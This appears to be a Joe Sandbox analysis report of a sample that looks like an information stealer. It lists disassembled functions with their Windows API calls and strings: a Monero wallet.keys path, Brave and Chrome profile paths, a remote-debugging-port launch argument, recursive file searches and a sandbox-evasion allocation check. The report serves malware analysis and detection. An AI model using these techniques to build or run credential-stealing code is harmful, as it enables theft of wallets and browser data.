Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: f75ca8276fb5816ba786d38d672ddbff72014a3cc316694a95f202d9e9e6762c
Instruction ID: 88b7276b04ebfa1bc57e4a4c1a544d1e6d397fff7d7c9cd05aaff1b0edea4c24
Opcode Fuzzy Hash: f75ca8276fb5816ba786d38d672ddbff72014a3cc316694a95f202d9e9e6762c
Instruction Fuzzy Hash: 120186B1A08349ABC704DF99DD45FAFBBB8F705711F100229F615E3280D7745A009BA1

Function 00CD1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00CD112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00CD1132
ExitProcess.KERNEL32 ref: 00CD1143

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 54008b3bf36d49051bff69e2455917c65be96c62db939412cb4e0e6c84305797
Instruction ID: a0b46f287a327e8d6a21c80e86c12ccb6f8613287c233f75a65077635a2a18f5
Opcode Fuzzy Hash: 54008b3bf36d49051bff69e2455917c65be96c62db939412cb4e0e6c84305797
Instruction Fuzzy Hash: 56E0E6B0A4930CFBE7107B919D0AF4D7AA89B05B15F104156F709761D0C6B526406A59

Function 00CD10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00CD10B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00CD10F7

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 9499ea952ec36ef32f58b8cb594827823115a9103717f48c0647f626b65727d8
Instruction ID: b9e88548ac20905cb4cad612e0f28c07ce87685effdc99b8d7a0c2153faf2d7b
Opcode Fuzzy Hash: 9499ea952ec36ef32f58b8cb594827823115a9103717f48c0647f626b65727d8
Instruction Fuzzy Hash: 21F082B1641318BBE714AAA4AC59FAEB7E8E705B05F300449FA04E7280D571AF049BA4

Function 00CD1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00CE7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CE7AA0
Part of subcall function 00CE7A70: RtlAllocateHeap.NTDLL(00000000), ref: 00CE7AA7
Part of subcall function 00CE7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00CE7ABF

Part of subcall function 00CE79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CD11B7), ref: 00CE7A10
Part of subcall function 00CE79E0: RtlAllocateHeap.NTDLL(00000000), ref: 00CE7A17
Part of subcall function 00CE79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00CE7A2F

ExitProcess.KERNEL32 ref: 00CD11C6

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: 3882ed7cf8ee4c14069439913a046b431112176ebb37f7d6fc3bc2b450c48c66
Instruction ID: b3a7052cd644a53cdc36743b000ce1416d2eeac9371bb29bc40e0a009d72dec6
Opcode Fuzzy Hash: 3882ed7cf8ee4c14069439913a046b431112176ebb37f7d6fc3bc2b450c48c66
Instruction Fuzzy Hash: 14E012E5D0434567CA1073B67C07F1F328C5B5530AF040415FA18D2202FE25E9046175

Non-executed Functions

Function 00CDBE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00CEAC82
Part of subcall function 00CEAC30: lstrcat.KERNEL32(00000000), ref: 00CEAC92

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

FindFirstFileA.KERNEL32(00000000,?,00CF0B32,00CF0B2F,00000000,?,?,?,00CF1450,00CF0B2E), ref: 00CDBEC5
StrCmpCA.SHLWAPI(?,00CF1454), ref: 00CDBF33
StrCmpCA.SHLWAPI(?,00CF1458), ref: 00CDBF49
FindNextFileA.KERNEL32(000000FF,?), ref: 00CDC8A9
FindClose.KERNEL32(000000FF), ref: 00CDC8BB

Strings

Brave, xrefs: 00CDC0E8
\Brave\Preferences, xrefs: 00CDC1C1
Preferences, xrefs: 00CDC104
--remote-debugging-port=9229 --profile-directory=", xrefs: 00CDC495
--remote-debugging-port=9229 --profile-directory=", xrefs: 00CDC3B2
Google Chrome, xrefs: 00CDC6F8
--remote-debugging-port=9229 --profile-directory=", xrefs: 00CDC534

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-1869280968
Opcode ID: 4f8ee7b63269e34bf79852211067773dfb6d86fafef9f4e537da78f56ab0aa78
Instruction ID: 1fe09add9f72990bd61a8cbe9390934ee1a7c57d52800f00f214823875ed3706
Opcode Fuzzy Hash: 4f8ee7b63269e34bf79852211067773dfb6d86fafef9f4e537da78f56ab0aa78
Instruction Fuzzy Hash: D15284729101489FCB14FB71DD96EEE737DAF54300F4145A9B50AA2191EF30AB48EF62

Function 00CE3B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00CE3B1C
FindFirstFileA.KERNEL32(?,?), ref: 00CE3B33
lstrcat.KERNEL32(?,?), ref: 00CE3B85
StrCmpCA.SHLWAPI(?,00CF0F58), ref: 00CE3B97
StrCmpCA.SHLWAPI(?,00CF0F5C), ref: 00CE3BAD
FindNextFileA.KERNEL32(000000FF,?), ref: 00CE3EB7
FindClose.KERNEL32(000000FF), ref: 00CE3ECC

Strings

%s\%s\%s, xrefs: 00CE3C9A
%s%s, xrefs: 00CE3CFD
%s\%s, xrefs: 00CE3BCA
%s\%s, xrefs: 00CE3CBF
%s\*, xrefs: 00CE3B10

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: ababf854d4fe2d5ab544fbdf5527b112c3dee842fbb3a9c3848956b2b4b80442
Instruction ID: a54e2d10df83cd01793e24ce5c1271b88aee31aa97ebb454282e3b39a8c6f00a
Opcode Fuzzy Hash: ababf854d4fe2d5ab544fbdf5527b112c3dee842fbb3a9c3848956b2b4b80442
Instruction Fuzzy Hash: C2A142B1A0034C9BDB24EFA5DC89FEA7378AB49700F044599B61D97181EB70AB84DF61

Function 00CE4B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00CE4B7C
FindFirstFileA.KERNEL32(?,?), ref: 00CE4B93
StrCmpCA.SHLWAPI(?,00CF0FC4), ref: 00CE4BC1
StrCmpCA.SHLWAPI(?,00CF0FC8), ref: 00CE4BD7
FindNextFileA.KERNEL32(000000FF,?), ref: 00CE4DCD
FindClose.KERNEL32(000000FF), ref: 00CE4DE2

Strings

%s\*, xrefs: 00CE4B70
%s\%s, xrefs: 00CE4C4B
%s\%s, xrefs: 00CE4BF4

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 9de68ec1f81cb93837d17cd2aa8926c670b30539a4eaeb15e665399c4bcb8d08
Instruction ID: 3d76e89cff7caacf56dad4faffeaf60bf9ecac74b2ceb176939e5ccbf74c98ba
Opcode Fuzzy Hash: 9de68ec1f81cb93837d17cd2aa8926c670b30539a4eaeb15e665399c4bcb8d08
Instruction Fuzzy Hash: D76147B290425CABCB24EFE1DC45FEA73BCBB49700F008598F60996151EB74AB84DF91

Function 00CE47C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00CE47D0
RtlAllocateHeap.NTDLL(00000000), ref: 00CE47D7
wsprintfA.USER32 ref: 00CE47F6
FindFirstFileA.KERNEL32(?,?), ref: 00CE480D
StrCmpCA.SHLWAPI(?,00CF0FAC), ref: 00CE483B
StrCmpCA.SHLWAPI(?,00CF0FB0), ref: 00CE4851
FindNextFileA.KERNEL32(000000FF,?), ref: 00CE48DB
FindClose.KERNEL32(000000FF), ref: 00CE48F0
lstrcat.KERNEL32(?,0159E550), ref: 00CE4915
lstrcat.KERNEL32(?,0159D458), ref: 00CE4928
lstrlen.KERNEL32(?), ref: 00CE4935
lstrlen.KERNEL32(?), ref: 00CE4946

Strings

%s\*, xrefs: 00CE47EA
%s\%s, xrefs: 00CE486B

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 671575355-2848263008
Opcode ID: 372dfe5d1d66ffddb384426f7989b4abdb2c0fff3bb12fde4fb52a5f45316e3b
Instruction ID: 83da6f90030a45770706998653a5716d608f4ee1582226903662422e9b4956cc
Opcode Fuzzy Hash: 372dfe5d1d66ffddb384426f7989b4abdb2c0fff3bb12fde4fb52a5f45316e3b
Instruction Fuzzy Hash: D95155B290431CABCB24FBB0DC89FEE737CAB59700F404598B61996191EB749B84DF91

Function 00CE40F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00CE4113
FindFirstFileA.KERNEL32(?,?), ref: 00CE412A
StrCmpCA.SHLWAPI(?,00CF0F94), ref: 00CE4158
StrCmpCA.SHLWAPI(?,00CF0F98), ref: 00CE416E
FindNextFileA.KERNEL32(000000FF,?), ref: 00CE42BC
FindClose.KERNEL32(000000FF), ref: 00CE42D1

Strings

%s\%s, xrefs: 00CE4107

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: c32e0b2bbcc7934a551cfecd0ff2aea4a7cafafa9a1d87d557c81ab15d09758c
Instruction ID: 7bb986e33a93937aade4d1f13ce05982e4b0384b2282e942363dad3da006fe56
Opcode Fuzzy Hash: c32e0b2bbcc7934a551cfecd0ff2aea4a7cafafa9a1d87d557c81ab15d09758c
Instruction Fuzzy Hash: F55156B290421CABCB24FBB0DC85FEE737CBB59700F404699B61996050EB75AB89DF50

Function 00CDEE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00CDEE3E
FindFirstFileA.KERNEL32(?,?), ref: 00CDEE55
StrCmpCA.SHLWAPI(?,00CF1630), ref: 00CDEEAB
StrCmpCA.SHLWAPI(?,00CF1634), ref: 00CDEEC1
FindNextFileA.KERNEL32(000000FF,?), ref: 00CDF3AE
FindClose.KERNEL32(000000FF), ref: 00CDF3C3

Strings

%s\*.*, xrefs: 00CDEE32

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 89874485c176a6a7049e29f02f292575c220afd82c37872abe369749207e814b
Instruction ID: ae8529ed01d22b6bbd3f9c580565b5eab84d1c2ca1d59b7d02458baa24c2fef8
Opcode Fuzzy Hash: 89874485c176a6a7049e29f02f292575c220afd82c37872abe369749207e814b
Instruction Fuzzy Hash: 55E10F729112589FDB64FB61CCA2EEE7339AF54300F4145E9B50A62092EF307B89DF52

